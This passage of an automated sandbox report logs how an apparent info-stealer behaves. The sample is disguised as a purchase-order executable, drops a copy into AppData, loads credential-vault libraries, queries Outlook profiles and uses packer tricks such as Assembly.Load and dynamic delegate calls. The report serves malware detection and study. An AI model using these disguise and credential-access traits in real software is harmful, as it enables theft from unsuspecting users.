                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: msv1_0.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: ntlmshared.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vaultcli.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: edputil.dll
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeStatic file information: File size 1083392 > 1048576
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x106600
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: System.Management.Automation.pdb-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer325DA9 source: powershell.exe, 00000001.00000002.1778310849.0000000007981000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1777916558.0000000007926000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: LrBtUp.pdb source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, ctsdvwT.exe.4.dr
                      Source: Binary string: LrBtUp.pdbSHA256 source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, ctsdvwT.exe.4.dr
                      Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbd source: powershell.exe, 00000001.00000002.1780173033.0000000008832000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.53c0000.5.raw.unpack, JwlrlmCCKvmG8rWaC9.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.2df3adc.0.raw.unpack, JwlrlmCCKvmG8rWaC9.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      .NET source code contains potential unpacker
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, ListagemTarefas.cs.Net Code: InitializeComponent
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, utfVXMWZH8mR5jCuu6.cs.Net Code: urEOmDpUy0 System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, utfVXMWZH8mR5jCuu6.cs.Net Code: urEOmDpUy0 System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, utfVXMWZH8mR5jCuu6.cs.Net Code: urEOmDpUy0 System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeCode function: 0_2_0127A16E push ecx; retf 0_2_0127A16F
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeCode function: 0_2_0127C45F push cs; retf 0_2_0127C46E
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04CF5A98 push edi; iretd 1_2_04CF5A3E
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04CF3AA8 push ebx; retf 1_2_04CF3ADA
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04CF42BF push ebx; ret 1_2_04CF42DA
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04CF5A2C push edi; iretd 1_2_04CF5A32
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04CF5A3B push edi; iretd 1_2_04CF5A3E
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04CF5A37 push edi; iretd 1_2_04CF5A3A
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04CF5A33 push edi; iretd 1_2_04CF5A36
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 5_2_02C8DC5C pushfd ; iretd 5_2_02C8F171
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeStatic PE information: section name: .text entropy: 7.918254359877085
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, Ce2Xf9cjqybYAM3F2w.csHigh entropy of concatenated method names: 'OjS0MRIe08', 'ttH0YsScod', 'aqiuUA1i5l', 'YFQuRkh1l5', 'uHn0PU2yyA', 'fo907Zl2Ch', 'uQO0IVvKe2', 'yIK0Zytajp', 'E2C01vicDf', 'jDF0je48LY'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, leE21PHPPCCd9mfVUy.csHigh entropy of concatenated method names: 'pEthoifBFx', 'sgXhJlw68X', 'zT5hmpto2m', 'pCHheEorQP', 'yoKh6snU5M', 'pTYhAZPDUN', 'TRehrgVr8U', 'HRVhQRickV', 'X7Khyey2lT', 'RymhqLIjqC'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, aVADjOVDuEeZsiv9gr.csHigh entropy of concatenated method names: 'Dispose', 'T0cRvXBjHO', 'tE2GTBWM8r', 'SnokkHLy9R', 'T3eRYgNK9H', 'o8xRzGZZ61', 'ProcessDialogKey', 'cqxGUlWFR4', 'DICGRlmUuP', 'eY7GGQYw0y'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, YUIl37IKJYjF8xf27m.csHigh entropy of concatenated method names: 'PrHSQ58NC9', 'sLbSyDDd8p', 'E40S3v1ljY', 'yUYST3SQQj', 'TdwS2EZxKB', 'SfgS5t8InR', 'QgBSDX1mmL', 'NBISt5RnnG', 'JOBSkfLgMj', 'MJOSPv6wpZ'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, mxKMTujwPb7MXUpb3w.csHigh entropy of concatenated method names: 'ToString', 'fKFbPyGtta', 'h7RbTh78XW', 'LyvbxMaHEJ', 'iRgb2jIQiw', 'RN0b5yw0vo', 'FgQbLyBR0F', 'vfpbDwhD2h', 'QrpbtrhXIX', 'Gx4bHY13n0'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, yF83lkDx7U66ctmbMp.csHigh entropy of concatenated method names: 'cU5hgAWSSD', 'b0qhs4Pw9C', 'RdHhdxx3f9', 'KhadYs86ur', 'cQBdzACA4A', 'ufghUHkIDX', 'u6QhRc3o2T', 'uSXhGaEWil', 'm83h93JvPN', 'TSUhO0rFwV'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, WTWIs8ORlK2dCEydd1.csHigh entropy of concatenated method names: 'LPnRhDUwym', 'fqkRW3Z3Ko', 'zj3RCXGBVn', 'XunRFYXDsf', 'mLHR8bVNVm', 'BLKRblT2Ko', 'XmvMrBugM0j0x7ytfa', 'UGTTKZRRCXOxxEfvvN', 'wX5RRU8Vug', 'YjaR97xsuS'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, zntx6TZ7Lbd4cPomW6.csHigh entropy of concatenated method names: 'ww68kQl4sH', 'hHR87JCUHr', 'RZs8ZSxi7D', 'FOE81BNJ40', 'taH8TXE3ZA', 'JtC8xUFp58', 'n9Q82stkSW', 'lcK85g9nWD', 'OR28LiVxJj', 'ONI8DL16Nc'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, utfVXMWZH8mR5jCuu6.csHigh entropy of concatenated method names: 'dtl9wSHLsw', 'Msc9gKMPU9', 'UyM9VPDDrp', 'ubc9sh973I', 'Cok9aj6bHX', 'sP19dPsj76', 'IEK9hniY3a', 'T1U9WDAWg1', 'UxN94iuI4B', 'C0t9C6dfM3'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, Kq767ssRxj1nqny8Z0.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'S64Gv2f46X', 'NH6GYDRc6V', 'gBZGz4ylCp', 'Aq49Uon7YW', 'cJf9RE5Ufe', 'XEu9GaH0Ck', 'Cbp99IyNrh', 'dKNwTsGoQJkwn9ixCIT'
